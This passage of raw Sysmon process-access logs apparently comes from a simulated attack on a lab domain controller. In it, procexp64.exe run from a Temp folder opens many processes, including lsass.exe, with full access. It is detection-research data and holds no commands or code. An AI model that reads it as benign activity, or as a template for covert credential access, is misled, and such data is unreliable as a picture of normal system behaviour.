Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790433Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790432Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790431Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790430Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790429Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790428Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790427Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790426Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790425Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790424Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790423Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790422Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790421Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790420Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790419Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790418Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790417Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790416Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790415Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790414Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790413Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790412Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790411Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790410Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790409Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790408Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790407Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790406Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790405Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790404Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790403Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790402Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790401Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790400Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790399Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790398Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790397Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:42.392{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790396Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 